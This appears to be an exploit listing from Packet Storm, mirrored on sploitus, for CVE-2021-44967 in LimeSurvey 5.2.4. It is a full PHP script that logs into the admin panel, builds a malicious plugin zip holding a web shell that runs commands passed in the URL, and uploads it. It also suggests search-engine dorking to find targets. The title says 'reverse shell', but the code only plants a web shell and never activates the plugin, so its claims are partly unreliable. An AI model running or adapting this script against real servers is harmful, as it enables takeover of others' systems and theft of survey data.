Share
## https://sploitus.com/exploit?id=PACKETSTORM:214834
=============================================================================================================================================
| # Title : LimeSurvey 5.2.4 reverse shell Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.limesurvey.org/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: This script is used to exploit vulnerability in LimeSurvey to load a malicious PHP plugin and execute a reverse shell.
(Related : https://packetstorm.news/files/id/189288/ Related CVE numbers: CVE-2021-44967 ) .
[+] save code as poc.php.
[+] Set TArget : line 112
[+] Usage : php poc.php
[+] PayLoad :
<?php
/**
* هذا السكريبت يُستخدم لاستغلال ثغرة CVE-2021-44967 في LimeSurvey لتحميل ملحق PHP خبيث وتنفيذ عكسية Shell.
*/
// تعطيل تحذيرات SSL
$context = stream_context_create([
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
]
]);
// إعدادات الملحق الخبيث
$plugin_name = "ExploitRCE_" . rand(1000, 9999);
$date = date("Y-m-d");
$xml_config = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
$xml_config .= "<config>\n";
$xml_config .= " <metadata>\n";
$xml_config .= " <name>$plugin_name</name>\n";
$xml_config .= " <type>plugin</type>\n";
$xml_config .= " <creationDate>$date</creationDate>\n";
$xml_config .= " <lastUpdate>$date</lastUpdate>\n";
$xml_config .= " <version>1.0</version>\n";
$xml_config .= " </metadata>\n";
$xml_config .= " <compatibility>\n";
$xml_config .= " <version>3.0</version>\n";
$xml_config .= " <version>4.0</version>\n";
$xml_config .= " <version>5.0</version>\n";
$xml_config .= " <version>6.0</version>\n";
$xml_config .= " <version>7.0</version>\n";
$xml_config .= " </compatibility>\n";
$xml_config .= "</config>";
// دالة تسجيل الدخول إلى LimeSurvey
function limesurvey_authenticate($url, $username, $password) {
echo "[*] محاولة تسجيل الدخول...\n";
$login_url = "$url/index.php/admin/authentication/sa/login";
$login_page = file_get_contents($login_url, false, $GLOBALS['context']);
preg_match('/name=\"YII_CSRF_TOKEN\" value=\"(.*?)\"/', $login_page, $matches);
$csrf_token = $matches[1] ?? '';
$data = http_build_query([
"YII_CSRF_TOKEN" => $csrf_token,
"authMethod" => "Authdb",
"user" => $username,
"password" => $password,
"login_submit" => "login"
]);
$options = [
"http" => [
"method" => "POST",
"header" => "Content-type: application/x-www-form-urlencoded",
"content" => $data,
]
];
$result = file_get_contents($login_url, false, stream_context_create($options));
if (strpos($result, '/index.php/admin/index') !== false) {
echo "[+] تسجيل الدخول ناجح!\n";
} else {
echo "[-] فشل تسجيل الدخول\n";
exit();
}
}
// رفع وتنفيذ الحمولة الخبيثة
function upload_payload($url, $plugin_name, $payload) {
echo "[*] رفع الحمولة الخبيثة...\n";
$upload_url = "$url/index.php/admin/pluginmanager?sa=upload";
$boundary = "----WebKitFormBoundary" . md5(time());
$data = "--$boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"the_file\"; filename=\"$plugin_name.zip\"\r\n";
$data .= "Content-Type: application/zip\r\n\r\n";
$data .= $payload . "\r\n";
$data .= "--$boundary--\r\n";
$options = [
"http" => [
"method" => "POST",
"header" => "Content-Type: multipart/form-data; boundary=$boundary",
"content" => $data,
]
];
$result = file_get_contents($upload_url, false, stream_context_create($options));
if (strpos($result, 'sa=uploadConfirm') !== false) {
echo "[+] رفع الحمولة ناجح!\n";
} else {
echo "[-] فشل في رفع الحمولة\n";
exit();
}
}
// إعداد الحمولة الخبيثة
$payload = "<?php system(\$_GET['cmd']); ?>";
$zip = new ZipArchive();
$zip_file = tempnam(sys_get_temp_dir(), "exploit") . ".zip";
$zip->open($zip_file, ZipArchive::CREATE);
$zip->addFromString("config.xml", $xml_config);
$zip->addFromString("payload.php", $payload);
$zip->close();
$payload_data = file_get_contents($zip_file);
unlink($zip_file);
// تنفيذ الاستغلال
$url = "http://target-limesurvey.com"; // استبدل بعنوان الهدف
$username = "admin";
$password = "password";
limesurvey_authenticate($url, $username, $password);
upload_payload($url, $plugin_name, $payload_data);
echo "[*] تم تنفيذ الاستغلال بنجاح!\n";
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================